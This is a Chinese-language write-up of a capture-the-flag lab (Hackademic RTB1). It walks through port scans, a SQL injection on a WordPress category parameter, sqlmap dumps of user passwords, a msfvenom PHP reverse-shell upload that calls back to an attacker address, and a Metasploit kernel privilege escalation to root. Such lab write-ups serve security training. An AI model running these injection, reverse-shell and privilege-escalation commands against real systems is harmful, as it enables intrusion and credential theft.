一、靶机信息
Name: Hackademic: RTB1(中等难度)
Date release: 6 Sep 2011
Author: mr.pr0n
Series: Hackademic
靶机IP:192.168.33.130
二、信息收集
1、端口扫描
nmap -sV 192.168.33.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-21 07:18 EST
Nmap scan report for 192.168.33.130
Host is up (0.00021s latency).
Not shown: 988 filtered tcp ports (no-response), 10 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:B9:22:10 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.47 seconds
开放了22端口;80端口上运行的是Apache httpd 2.2.15的服务,并且目标系统是Fedora
2、打开web界面在http://192.168.33.130/Hackademic_RTB1/?cat=1这个地方发现了sql注入
3、目录扫描
并没有发现啥可用信息
_|. _ _ _ _ _ _|_ v0.4.2.6
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11347
Output File: /root/Desktop/目录扫描/dirsearch/reports/192.168.33.130/__23-02-21_19-14-24.txt
Target: http://192.168.33.130/
[19:14:24] Starting:
[19:14:25] 403 - 293B - /.ht_wsr.txt
[19:14:25] 403 - 296B - /.htaccess.bak1
[19:14:25] 403 - 296B - /.htaccess_orig
[19:14:25] 403 - 296B - /.htaccess.save
[19:14:25] 403 - 298B - /.htaccess.sample
[19:14:25] 403 - 296B - /.htaccess.orig
[19:14:25] 403 - 294B - /.htaccessOLD
[19:14:25] 403 - 294B - /.htaccess_sc
[19:14:25] 403 - 286B - /.htm
[19:14:25] 403 - 287B - /.html
[19:14:25] 403 - 295B - /.htaccessOLD2
[19:14:25] 403 - 297B - /.htaccess_extra
[19:14:25] 403 - 296B - /.htpasswd_test
[19:14:25] 403 - 293B - /.httr-oauth
[19:14:25] 403 - 292B - /.htpasswds
[19:14:25] 403 - 294B - /.htaccessBAK
[19:14:33] 403 - 290B - /cgi-bin/
[19:14:36] 403 - 288B - /error/
[19:14:38] 200 - 1KB - /index.html
[19:14:42] 403 - 292B - /phpMyAdmin
[19:14:42] 403 - 292B - /phpmyadmin
[19:14:43] 403 - 293B - /phpmyadmin/
[19:14:43] 403 - 293B - /phpMyAdmin/
[19:14:43] 403 - 313B - /phpmyadmin/docs/html/index.html
[19:14:43] 403 - 302B - /phpmyadmin/ChangeLog
[19:14:43] 403 - 302B - /phpmyadmin/index.php
[19:14:43] 403 - 312B - /phpmyadmin/doc/html/index.html
[19:14:43] 403 - 310B - /phpMyAdmin/scripts/setup.php
[19:14:43] 403 - 313B - /phpMyAdmin/phpMyAdmin/index.php
[19:14:43] 403 - 313B - /phpmyadmin/phpmyadmin/index.php
[19:14:43] 403 - 299B - /phpmyadmin/README
[19:14:43] 403 - 310B - /phpmyadmin/scripts/setup.php
[19:14:43] 403 - 302B - /phpMyAdmin/index.php
Task Completed
换目录继续扫得到wp_login.php,发现是后台登录地址
─# python dirsearch.py -u http://192.168.33.130/Hackademic_RTB1/
_|. _ _ _ _ _ _|_ v0.4.2.6
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11347
Output File: /root/Desktop/目录扫描/dirsearch/reports/192.168.33.130/_Hackademic_RTB1__23-02-21_19-17-57.txt
Target: http://192.168.33.130/Hackademic_RTB1/
[19:17:57] Starting:
[19:17:58] 403 - 309B - /Hackademic_RTB1/.ht_wsr.txt
[19:17:58] 403 - 314B - /Hackademic_RTB1/.htaccess.sample
[19:17:58] 403 - 312B - /Hackademic_RTB1/.htaccess.bak1
[19:17:58] 403 - 312B - /Hackademic_RTB1/.htaccess_orig
[19:17:58] 403 - 312B - /Hackademic_RTB1/.htaccess.save
[19:17:58] 403 - 310B - /Hackademic_RTB1/.htaccessOLD
[19:17:58] 403 - 311B - /Hackademic_RTB1/.htaccessOLD2
[19:17:58] 403 - 312B - /Hackademic_RTB1/.htaccess.orig
[19:17:58] 403 - 313B - /Hackademic_RTB1/.htaccess_extra
[19:17:58] 403 - 310B - /Hackademic_RTB1/.htaccessBAK
[19:17:58] 403 - 303B - /Hackademic_RTB1/.html
[19:17:58] 403 - 302B - /Hackademic_RTB1/.htm
[19:17:58] 403 - 308B - /Hackademic_RTB1/.htpasswds
[19:17:58] 403 - 309B - /Hackademic_RTB1/.httr-oauth
[19:17:58] 403 - 312B - /Hackademic_RTB1/.htpasswd_test
[19:17:58] 403 - 310B - /Hackademic_RTB1/.htaccess_sc
[19:18:11] 500 - 2KB - /Hackademic_RTB1/index.php
[19:18:11] 404 - 2KB - /Hackademic_RTB1/index.php/login/
[19:18:12] 200 - 15KB - /Hackademic_RTB1/license.txt
[19:18:17] 200 - 9KB - /Hackademic_RTB1/readme.html
[19:18:24] 301 - 335B - /Hackademic_RTB1/wp-admin -> http://192.168.33.130/Hackademic_RTB1/wp-admin/
[19:18:24] 200 - 184B - /Hackademic_RTB1/wp-admin/setup-config.php
[19:18:24] 200 - 0B - /Hackademic_RTB1/wp-config.php
[19:18:24] 200 - 1KB - /Hackademic_RTB1/wp-admin/install.php
[19:18:24] 302 - 0B - /Hackademic_RTB1/wp-admin/ -> /Hackademic_RTB1/wp-login.php?redirect_to=%2FHackademic_RTB1%2Fwp-admin%2F
[19:18:24] 200 - 1KB - /Hackademic_RTB1/wp-content/
[19:18:24] 301 - 337B - /Hackademic_RTB1/wp-content -> http://192.168.33.130/Hackademic_RTB1/wp-content/
[19:18:24] 500 - 0B - /Hackademic_RTB1/wp-content/plugins/hello.php
[19:18:24] 301 - 338B - /Hackademic_RTB1/wp-includes -> http://192.168.33.130/Hackademic_RTB1/wp-includes/
[19:18:24] 200 - 0B - /Hackademic_RTB1/wp-includes/rss-functions.php
[19:18:24] 200 - 6KB - /Hackademic_RTB1/wp-includes/
[19:18:24] 200 - 1KB - /Hackademic_RTB1/wp-login.php
[19:18:24] 200 - 2KB - /Hackademic_RTB1/wp.php
[19:18:24] 200 - 1KB - /Hackademic_RTB1/wp-register.php
[19:18:24] 200 - 42B - /Hackademic_RTB1/xmlrpc.php
三、SQL注入
对http://192.168.33.130/Hackademic_RTB1/?cat=1进行SQL注入测试
http://192.168.33.130/Hackademic_RTB1/?cat=1 order by 5 得到列数
http://192.168.33.130/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3,4,5 得到数据库
sqlmap一把梭哈
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" --dbs --batch
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" --D wordpress --tables --batch
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batch
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --dump --batch
最后得到用户数据为
|序号|密码|用户名|
|-------|-------|-------|
|1|admin|NickJames|
|2|kernel|MaxBucky|
|3|maxwell|JasonKonnors|
|4|napoleon|TonyBlack|
|5|q1w2e3|GeorgeMiller|
三、GetShell
尝试使用刚刚爆破出来的账号密码进行登录,最后发现GeorgeMiller拥有配置的权限。在Options->Miscellaneous可添加PHP在upload上传马子
生成PHP马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.33.129 lport=6789 -f raw > ./shell.php
开启监听
访问上传之后的地址即可上线
查看内核版本是2.6.3
提权
msf6 > search 2.6.3
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/hp_mpa_job_acct 2011-12-21 excellent Yes HP Managed Printing Administration jobAcct Remote Command Execution
1 exploit/linux/local/sock_sendpage 2009-08-13 great Yes Linux Kernel Sendpage Local Privilege Escalation
2 exploit/linux/local/rds_rds_page_copy_user_priv_esc 2010-10-20 great Yes Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation
3 auxiliary/admin/http/telpho10_credential_dump 2016-09-02 normal No Telpho10 Backup Credentials Dumper
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/admin/http/telpho10_credential_dump
msf6 > use exploit/linux/local/rds_rds_page_copy_user_priv_esc
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lport 6789
lport => 6789
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 192.168.33.129
lhost => 192.168.33.129
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session architecture: php
[*] Started reverse TCP handler on 192.168.33.129:6789
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.w2iBkASs' (235 bytes) ...
[*] Launching exploit...
[*] Sending stage (1017704 bytes) to 192.168.33.130
[*] Meterpreter session 2 opened (192.168.33.129:6789 -> 192.168.33.130:56310) at 2023-02-21 20:03:55 -0500
meterpreter > shell
Process 4879 created.
Channel 1 created.
whoami
root
ls
plugins
shell.php
themes
cd /
ls
bin
boot
dev
etc
home
lib
lost+found
media
mnt
opt
proc
root
sbin
selinux
srv
sys
tmp
usr
var
cd /root
ls
Desktop
anaconda-ks.cfg
key.txt
key.txt~
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)
$_d&jgQ>>ak\#b"(Hx"o<la_%
Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com
四、总计
这次攻击路径是从sql注入漏洞入手,爆出了数据库中账户密码,并然后进行目录扫描发现后台登陆地址,寻找上传点上传反弹shell文件获得shell,最后利用linux内核进行了提权。接下来应该将sqlmap仔细研究一下,并着重练习一下提权姿势。
评论区